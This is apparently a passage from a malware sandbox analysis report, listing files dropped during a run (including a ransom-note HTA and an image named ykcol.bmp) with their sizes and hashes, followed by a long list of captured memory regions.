                                                                            57823edbeb07858c8fcbddbbf9dbecac

                                                                            SHA1

                                                                            7fa6f55b7898dd2297a228f428a19bb6c7fba93b

                                                                            SHA256

                                                                            95307ce9e2b82db1bdaa8721863aeb8acfaf0a4af5ff1ff321d915dd08cb4eca

                                                                            SHA512

                                                                            128b4df55c2d403eb489cca8efcda9648cc865b0a682be4bab9b193cd1d5f6101a006253e63c70bb709d6422727bc0d07066cccfdcf9979e574fdf3ce16850b2

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\00299\scan.exe
                                                                            Filesize

                                                                            184KB

                                                                            MD5

                                                                            eb128e3e483a53556c05e3d6ed6a8303

                                                                            SHA1

                                                                            509f9651bcf360b6610bf8637ffac029504d3050

                                                                            SHA256

                                                                            06e68b0a12fad2ed6d7efe27160ea165324f1347a0c92838c1a74af6bc33f21f

                                                                            SHA512

                                                                            d896614d61d0e9162132aedf78fe3c3b588da7aa24868ea7c9f699a9e527ae0c05d72ec1ff8a6b48cdceb8461d84fa6cad6cae41aac76affe8d7a7ba22c08cdc

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\ykcol.bmp
                                                                            Filesize

                                                                            3.3MB

                                                                            MD5

                                                                            7861cdc3ecb089cd9975b18378b42232

                                                                            SHA1

                                                                            0c7e384d1606ea95d3e302e308ac8dc5fbf67c53

                                                                            SHA256

                                                                            8e481451513980e0923c01518ddc8ab323775a2065317cb89715cfc99a25e1d1

                                                                            SHA512

                                                                            cdc92f0438254d86c3e63d003ce3e698745b9f3aa119b3bd4bd6f014470b9f104d2745719d53c32a31825908fe0bf1ff8078ecc1668b4b2fad5348f11db42f71

                                                                            Download Submit

                                                                          • C:\Users\Admin\Desktop\ykcol.bmp
                                                                            Filesize

                                                                            3.3MB

                                                                            MD5

                                                                            91b332e2f5a9bc4b8ec951bfab65c182

                                                                            SHA1

                                                                            471bd1c487b3b5d53b8c75ed24a97a7071dfba7b

                                                                            SHA256

                                                                            02e2c8e16190f328d20eb1908f9121acc996ce02a6a8bd2ffc2adb6cc3e9ae9b

                                                                            SHA512

                                                                            ac19cfa5c301e0cc0d0e7df2f5e8de5c0a205f8b247aa85ce9bf7a6acaa801b728a0f946ed18f6549ad90f9b05ca474d497714eaa9d81a938366c4a6a0a7095e

                                                                            Download Submit

                                                                          • C:\Users\Admin\Music\!HELP_SOS.hta
                                                                            Filesize

                                                                            67KB

                                                                            MD5

                                                                            1fbfe52e9d1eae27b0c28206f685dd79

                                                                            SHA1

                                                                            7fa388f8ae3caf8bc5c7332b5f3edb1459595511

                                                                            SHA256

                                                                            79e0de353f493f25db451348d93165c53fd445f8224d260458e1ad2f2f2a4a64

                                                                            SHA512

                                                                            8813a25171f2d887be791ce9ce01a7056b34932b682121b37d4210a7cc42c5cb194c097ee3236ba713194dec821f0d55cc4372d16806e879d97eb3eed9d70190

                                                                            Download Submit

                                                                          • C:\Users\Public\Videos\PAXYHOK.html
                                                                            Filesize

                                                                            9KB

                                                                            MD5

                                                                            d573fe70adc029fa2d36373321da152e

                                                                            SHA1

                                                                            da8dbd7f4e390332393a7aea6bbf6b4fb349dab3

                                                                            SHA256

                                                                            da6f91cb4139b56f81d35cd0769afde0dc430a33d534fa0269770d156b8a4719

                                                                            SHA512

                                                                            9bc10e021f1d435f7cc5af93b34bc97ef3aa599307239ccbafec357ebf36ee9bff43754c26b70d8327b86242576048b7413b7d3298718259b0fa49f3ee788988

                                                                            Download Submit

                                                                          • C:\Windows\Installer\MSI31C1.tmp
                                                                            Filesize

                                                                            363KB

                                                                            MD5

                                                                            4a843a97ae51c310b573a02ffd2a0e8e

                                                                            SHA1

                                                                            063fa914ccb07249123c0d5f4595935487635b20

                                                                            SHA256

                                                                            727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086

                                                                            SHA512

                                                                            905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2

                                                                            Download Submit

                                                                          • \Users\Admin\AppData\Local\Temp\nszA141.tmp\System.dll
                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            883eff06ac96966270731e4e22817e11

                                                                            SHA1

                                                                            523c87c98236cbc04430e87ec19b977595092ac8

                                                                            SHA256

                                                                            44e5dfd551b38e886214bd6b9c8ee913c4c4d1f085a6575d97c3e892b925da82

                                                                            SHA512

                                                                            60333253342476911c84bbc1d9bf8a29f811207787fdd6107dce8d2b6e031669303f28133ffc811971ed7792087fe90fb1faabc0af4e91c298ba51e28109a390

                                                                            Download Submit

                                                                          • memory/768-1728-0x0000000000580000-0x000000000058A000-memory.dmp

                                                                            Filesize

                                                                            40KB

                                                                            Download

                                                                          • memory/1096-580-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1096-698-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1096-584-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1096-697-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1096-586-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1096-582-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1096-696-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1096-699-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1096-695-0x0000000000350000-0x0000000000367000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1172-700-0x0000000000130000-0x0000000000147000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1172-701-0x0000000000130000-0x0000000000147000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1172-593-0x0000000000130000-0x0000000000147000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1172-703-0x0000000000130000-0x0000000000147000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1172-702-0x0000000000130000-0x0000000000147000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1172-589-0x0000000000130000-0x0000000000147000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1172-591-0x0000000000130000-0x0000000000147000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1208-598-0x0000000002D20000-0x0000000002D37000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1208-596-0x0000000002D20000-0x0000000002D37000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/1392-256-0x0000000000400000-0x000000000049D000-memory.dmp

                                                                            Filesize

                                                                            628KB

                                                                            Download

                                                                          • memory/1392-1225-0x0000000000400000-0x000000000049D000-memory.dmp

                                                                            Filesize

                                                                            628KB

                                                                            Download

                                                                          • memory/1392-35487-0x0000000000400000-0x000000000049D000-memory.dmp

                                                                            Filesize

                                                                            628KB

                                                                            Download

                                                                          • memory/1416-23542-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                            Filesize

                                                                            584KB

                                                                            Download

                                                                          • memory/1416-134-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                            Filesize

                                                                            584KB

                                                                            Download

                                                                          • memory/1416-679-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                            Filesize

                                                                            584KB

                                                                            Download

                                                                          • memory/1460-39062-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-71-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-70-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-72-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-23711-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-23712-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-38431-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-38428-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-25016-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-29448-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-25636-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-25644-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-27661-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1460-39063-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                            Filesize

                                                                            5.9MB

                                                                            Download

                                                                          • memory/1508-564-0x0000000000B90000-0x0000000000BAB000-memory.dmp

                                                                            Filesize

                                                                            108KB

                                                                            Download

                                                                          • memory/1596-122-0x0000000000400000-0x00000000004F3000-memory.dmp

                                                                            Filesize

                                                                            972KB

                                                                            Download

                                                                          • memory/1808-82-0x0000000000400000-0x000000000041D000-memory.dmp

                                                                            Filesize

                                                                            116KB

                                                                            Download

                                                                          • memory/1836-260-0x0000000000400000-0x0000000000498000-memory.dmp

                                                                            Filesize

                                                                            608KB

                                                                            Download

                                                                          • memory/1836-22491-0x0000000000400000-0x0000000000498000-memory.dmp

                                                                            Filesize

                                                                            608KB

                                                                            Download

                                                                          • memory/1836-1233-0x0000000000400000-0x0000000000498000-memory.dmp

                                                                            Filesize

                                                                            608KB

                                                                            Download

                                                                          • memory/1868-1898-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                            Filesize

                                                                            328KB

                                                                            Download

                                                                          • memory/1932-1230-0x0000000003FF0000-0x0000000004103000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                            Download

                                                                          • memory/1932-1242-0x0000000000810000-0x0000000000923000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                            Download

                                                                          • memory/1932-1229-0x0000000003FF0000-0x0000000004103000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                            Download

                                                                          • memory/1932-464-0x0000000000810000-0x0000000000923000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                            Download

                                                                          • memory/1932-1226-0x0000000003FF0000-0x0000000004103000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                            Download

                                                                          • memory/1932-93-0x0000000000810000-0x0000000000923000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                            Download

                                                                          • memory/2228-267-0x00000000011C0000-0x00000000011EE000-memory.dmp

                                                                            Filesize

                                                                            184KB

                                                                            Download

                                                                          • memory/2228-849-0x00000000011C0000-0x00000000011EE000-memory.dmp

                                                                            Filesize

                                                                            184KB

                                                                            Download

                                                                          • memory/2356-273-0x0000000000400000-0x0000000000488000-memory.dmp

                                                                            Filesize

                                                                            544KB

                                                                            Download

                                                                          • memory/2356-859-0x0000000000400000-0x0000000000488000-memory.dmp

                                                                            Filesize

                                                                            544KB

                                                                            Download

                                                                          • memory/2524-704-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                            Filesize

                                                                            328KB

                                                                            Download

                                                                          • memory/2524-1053-0x00000000024A0000-0x00000000024B0000-memory.dmp

                                                                            Filesize

                                                                            64KB

                                                                            Download

                                                                          • memory/2524-190-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                            Filesize

                                                                            328KB

                                                                            Download

                                                                          • memory/2524-1875-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                            Filesize

                                                                            328KB

                                                                            Download

                                                                          • memory/2764-5464-0x00000000013E0000-0x00000000014F3000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                            Download

                                                                          • memory/2764-1240-0x00000000013E0000-0x00000000014F3000-memory.dmp

                                                                            Filesize

                                                                            1.1MB

                                                                            Download

                                                                          • memory/2860-241-0x000007FEF64B0000-0x000007FEF64D7000-memory.dmp

                                                                            Filesize

                                                                            156KB

                                                                            Download

                                                                          • memory/2860-245-0x000007FEF58F0000-0x000007FEF5A74000-memory.dmp

                                                                            Filesize

                                                                            1.5MB

                                                                            Download

                                                                          • memory/2860-465-0x000007FEF64B0000-0x000007FEF64D7000-memory.dmp

                                                                            Filesize

                                                                            156KB

                                                                            Download

                                                                          • memory/2900-3117-0x0000000002260000-0x0000000002270000-memory.dmp

                                                                            Filesize

                                                                            64KB

                                                                            Download

                                                                          • memory/2900-31431-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                            Filesize

                                                                            328KB

                                                                            Download

                                                                          • memory/2900-1897-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                            Filesize

                                                                            328KB

                                                                            Download

                                                                          • memory/2900-31725-0x0000000002260000-0x0000000002270000-memory.dmp

                                                                            Filesize

                                                                            64KB

                                                                            Download

                                                                          • memory/3196-694-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                            Filesize

                                                                            340KB

                                                                            Download

                                                                          • memory/3196-693-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                            Download

                                                                          • memory/3196-691-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                            Filesize

                                                                            340KB

                                                                            Download

                                                                          • memory/3196-689-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                            Filesize

                                                                            340KB

                                                                            Download

                                                                          • memory/3196-687-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                            Filesize

                                                                            340KB

                                                                            Download

                                                                          • memory/3196-685-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                            Filesize

                                                                            340KB

                                                                            Download

                                                                          • memory/3196-683-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                            Filesize

                                                                            340KB

                                                                            Download

                                                                          • memory/3196-681-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                            Filesize

                                                                            340KB

                                                                            Download

                                                                          • memory/3764-553-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                            Filesize

                                                                            72KB

                                                                            Download

                                                                          • memory/3764-554-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                            Filesize

                                                                            72KB

                                                                            Download

                                                                          • memory/3788-678-0x00000000005A0000-0x00000000005AC000-memory.dmp

                                                                            Filesize

                                                                            48KB

                                                                            Download

                                                                          • memory/3844-570-0x00000000005C0000-0x00000000005D7000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/3844-566-0x0000000000410000-0x00000000004AF000-memory.dmp

                                                                            Filesize

                                                                            636KB

                                                                            Download

                                                                          • memory/3844-568-0x00000000006E0000-0x000000000080D000-memory.dmp

                                                                            Filesize

                                                                            1.2MB

                                                                            Download

                                                                          • memory/3844-569-0x0000000000BA0000-0x0000000000CA9000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                            Download

                                                                          • memory/3912-579-0x0000000001FC0000-0x0000000001FD7000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/3912-573-0x0000000000420000-0x00000000004BF000-memory.dmp

                                                                            Filesize

                                                                            636KB

                                                                            Download

                                                                          • memory/3912-572-0x00000000002B0000-0x0000000000379000-memory.dmp

                                                                            Filesize

                                                                            804KB

                                                                            Download

                                                                          • memory/3912-574-0x0000000000380000-0x000000000039F000-memory.dmp

                                                                            Filesize

                                                                            124KB

                                                                            Download

                                                                          • memory/3912-575-0x0000000000700000-0x000000000082D000-memory.dmp

                                                                            Filesize

                                                                            1.2MB

                                                                            Download

                                                                          • memory/3912-571-0x0000000000400000-0x0000000000417000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/3912-576-0x0000000000830000-0x00000000008A1000-memory.dmp

                                                                            Filesize

                                                                            452KB

                                                                            Download

                                                                          • memory/3912-578-0x00000000021F0000-0x00000000022F9000-memory.dmp

                                                                            Filesize

                                                                            1.0MB

                                                                            Download

                                                                          • memory/3912-577-0x0000000000400000-0x0000000000417000-memory.dmp

                                                                            Filesize

                                                                            92KB

                                                                            Download

                                                                          • memory/4092-959-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                            Filesize

                                                                            328KB

                                                                            Download

                                                                          • memory/4092-1905-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                            Filesize

                                                                            328KB

                                                                            Download